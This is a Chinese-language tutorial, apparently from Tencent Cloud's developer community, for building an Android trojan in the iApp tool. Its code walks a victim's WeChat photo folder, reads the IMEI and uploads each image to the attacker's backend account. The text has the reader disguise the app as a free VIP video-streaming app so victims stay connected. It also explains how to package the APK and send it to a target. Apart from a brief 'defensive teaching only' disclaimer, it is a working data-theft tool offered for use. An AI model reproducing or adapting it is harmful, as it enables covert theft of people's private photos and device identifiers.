本文仅用于信息防御技术教学 请勿用于其他用途
最新文档地址:https://gitee.com/zxwljs/up-dcim
社会工程学(Social Engineering,又被翻译为:社交工程学)在上世纪60年代左右作为正式的学科出现,广义社会工程学的定义是:建立理论并通过利用自然的、社会的和制度上的途径来逐步地解决各种复杂的社会问题,经过多年的应用发展,社会工程学逐渐产生出了分支学科,如公安社会工程学(简称公安社工学)和网络社会工程学。
社会工程学是利用者的一个灵活性,对对方漏洞进行分析,分析以后加以总结。
这个实例使用的是对被攻击者的安卓系统的权限漏洞所进行的信息收集。
系统环境:安卓系统Android
软件环境:iapp
各大应用商店即可下载
https://app.mi.com/details?id=com.iapp.app&ref=search(小米应用商店地址)
这个代码的逻辑是使用受攻击者对软件权限的信任,从而实现上传用户手机的相册到服务器。
因为上传相册需要大量的宽带(就是流量),所以客户端前端套用追剧软件,以免受攻击者产生疑虑。
本实例使用叮当数据的相册备份服务,该服务是为用户提供备份相册而开发的,我们可以使用该服务,实现直接上传受攻击者的相册到开发者后台。
打开微信小程序点击开始使用然后注册一个账号
记录下用户名
文档地址:https://api.1ove.icu/iApp/dcim
s path = "/storage/emulated/0/Pictures/WeiXin/"
//这个是微信保存图片的路径
//必须以"/storage/emulated/0/"开头 "/"结尾
// "/storage/emulated/0/DCIM/Camera"是安卓相机的默认储存目录
fl(path, files)
// path 路径 files 路径下所有的文件
for(filename; files)
{
//filename 文件名
syso("️开始️")
syso(filename)
ss(path+filename,filepath)
//filepath 文件路径
fs(filepath, size)
s2(size/1024/1024, mb)
//mb 图片大小
f(mb > 5)
{
syso(mb)
syso("文件过大")
syso("️结束")
syso("----------------------")
}else
{
syso("开始上传")
//API列表
s api = "http://httpbin.org/post"
//00000000000000000000000设置参数
// 用户特殊标识 一般用imei
simei(imei)
//自定义参数 s imei = "my code"
//设置你的 叮当数据 用户名 用于后台查看用户上传的文件
s user = "admin@qq.com"
//0000000000000000000000
//变量相加
ss("user="+user+"&filename="+filename+"&id="+imei,data)
//校检数据
huf(api, data , filepath,"utf-8", e)
//上传数据 e为httpbin的返回结果
}
}
在叮当数据里面获取用户名
s user = "这里写你的用户名"
源码示例:https://gitee.com/zxwljs/code-base/blob/master/iApp/com.fan.iapp.iApp
本教程前端程序套用了免vip追剧的网站,使得用户可以在网络良好的情况下长时间使用该软件
为上传相册提供了温床
这个程序内容可以自己修改,这里写了一个webview,直接使用浏览器控件访问VIP影视网站
核心目的是使得用户可以在网络良好的情况下长时间使用该软件,为上传相册提供环境
下载好以后一般直接打开后选择iapp即可
如无法导入,可以点击右上角导入,一般安卓系统自带浏览器保存的路径是Download
导入以后,点击可视化编程进入编程页面
点击右边的控件 ->界面事件 -> 载入事件
找到55行的
s user = "admin@qq.com"
换成你的用户名
返回到软件的信息页面,下拉点击打包测试
若弹出安装页面,先不用安装
下拉找到分享发送
长按安装包 -勾选- 选择合并发送
一定要选择合并发送,否则对方无法顺利安装
受攻击者打开后,可前往后台查看数据(小程序)
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。